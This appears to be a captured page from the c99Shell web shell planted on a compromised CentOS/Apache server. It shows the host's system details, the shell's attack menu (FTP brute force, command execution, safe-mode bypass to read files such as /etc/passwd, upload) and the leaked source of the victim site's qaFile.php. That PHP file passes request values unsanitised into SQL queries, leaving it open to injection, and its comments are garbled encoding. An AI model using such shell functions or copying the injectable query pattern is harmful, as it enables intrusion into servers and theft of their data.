110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/ drwxr-xr-x Free 52.82 GB of 127.8 GB (41.33%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686

uid=48(apache) gid=48(apache) groups=48(apache)

Safe-mode: OFF (not secure)

/var/www/html/manage/ drwxr-xr-x
Free 52.82 GB of 127.8 GB (41.33%)
Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout

Viewing file: qaFile.php (4.27 KB) -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<?php

	/**  Define Validate Access  */
	define( '_VALID_ACCESS', 1 );
	
	/**  Configuration  */
	include( "configuration.php" );
	require_once( $_Config_absolute_path . "/includes/framework.php" );

	/**  Create Database Object  */
	$dbObj = new DBConn;
		
	/**  Config Table for This Page  */
	$myTable = "  qa_report_tb";
	$myTableFK = "code";
	/**  Paging */
	$page = $_GET['page'];
	if( $page == "" ) { $page = 1; }
		
	/**  ЁУ№З№ўйНБЩЕ µиН 1 Л№йТ  */
	$perpage = $_REQUEST['perpage'];
	if( $perpage == "" ) { $perpage = 20; }		
	/**  вїЕаґНГмдїЕмаНЎКТГ */
	$doc_path = $_Config_live_site."/Qa_pic";
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />
<title><?=$_Config_sitename;?> - ўйНБЩЕЎТГ»ГРЎС№¤ШіАТѕ</title>
<script type="text/javascript" src="./js/utilities.js"></script>
<link href="./css/default.css" rel="stylesheet" type="text/css" />
</head>

<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">
<table width="726" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="706" align="center" valign="top" style="padding:10px 0px 5px 10px">
    <?php
		/**  Config Paging  */
		$limit = 50;
		$scroll = $_Config_scroll; 
		
		/**  µСй§¤иТ Default КУЛГСєЎТГ·У Order By  */
		if( $OrderBy == "" ) { $OrderBy = $myTableFK; }
						
		if( !isset($_GET['ASCDESC']) ) { $ASCDESC = "ASC"; }
						
		if( $_GET['ASCDESC'] == "DESC" ) { $ASCDESC = "ASC"; }
		elseif( $_GET['ASCDESC'] == "ASC" ) { $ASCDESC = "DESC"; } 
		
		/**  Query аѕЧиНЛТ Numrows ЎиН№  */
		$query = " SELECT *  FROM $myTable  WHERE     code='$code'  ";
		$result = $dbObj->execQuery($query);
		$numrows = $dbObj->_numrows;
		
		/**  Paging  */
		$display = ( !isset ($_GET['page']) ) ? 1 : $_GET['page'];
		$start = ( ($display * $limit) - $limit );
		/**  Paging  */
	
		if( isset($_GET['OrderBy']) ) {
			$query = " SELECT *  FROM $myTable  WHERE    code='$code'   ORDER BY $OrderBy $ASCDESC ";
		} 
		elseif( !isset($_GET['OrderBy']) ) {
			$query = " SELECT *  FROM $myTable  WHERE code='$code'  ORDER BY $myTableFK ASC ";
		}
		
		$query .= " LIMIT $start, $limit ";
		$result = $dbObj->execQuery($query);
    ?>
    <fieldset>
     <table width="675" border="0" cellspacing="0" cellpadding="0">
      <tr>
        <td width="675" height="5"></td>
      </tr>
      
      <tr>
        <td>&nbsp;</td>
      </tr>
      <tr>
        <td align="center" valign="top"><table width="98%" border="0" align="center" cellpadding="1" cellspacing="1" bgcolor="#FFFFFF" style="background-color:#eeeeee; border:0px solid gray">
          	<tr bgcolor="#F0F0F0">
          	  	<td height="25" colspan="2" align="left" bordercolor="#999966" bgcolor="#FFFFFF" class="PADDING-LEFT-10"><strong>ЛЕСЎ°Т№ЎТГ»ГРЎС№¤ШіАТѕЎТГИЦЎЙТ</strong></td>
       	  	  </tr>
          	<?php
				$no = 1+($display-1)*$limit;
				while( $rs = $dbObj->fetchArray($result) ) { 
					$bgColor = ( $bgColor == "#FFFFFF" ) ? "#F9FBFB" : "#FFFFFF";
          	?>
          	<tr bgcolor="<?=$bgColor;?>">
          	  <td width="5%" height="20" align="right"><img src="images/icons/linesub.gif" width="16" height="16" border="0" align="absmiddle" /></td>
          	  <td align="left" class="PADDING-LEFT-5"><a href="javascript:;" onclick="NewWindow('<?=$doc_path;?>/<?=$rs["Filename"]?>','Detail','850','600','yes');"><span class="BORDER-TOP">
          	    			
          	  </span>
          	    <?php if( $rs['Filename'] != "" ) echo $Filename; else echo "&nbsp;"; ?><?=$rs["Report_name"];?></a></td>
          	  </tr>
          	<?php
					//$no++;
				} # while
          	?>
          	<tr>
          	  <td height="22" colspan="2" align="center" bgcolor="#F8F8F8"><strong>·Сй§ЛБґ <span class="NOTE"><?php echo $numrows; ?></span> ГТВЎТГ</strong></td>
          	</tr>
      </table></td>
      </tr>
      <tr>
        <td>&nbsp;</td>
      </tr>
    </table>
    </fieldset></td>
  </tr>
</table>
</body>
</html>
<?php
	/**  Free Resource */
	$dbObj->freeresult($result);
	
	/**  Close the Database  */
	$dbObj->disconn();
	
	/**  Unset Class  */
	unset($dbObj);
?>

:: Command execute ::
Enter:	Select:

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Search ::

:: Upload ::

:: Make Dir ::

:: Make File ::

:: Go Dir ::

:: Go File ::

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0061 ]--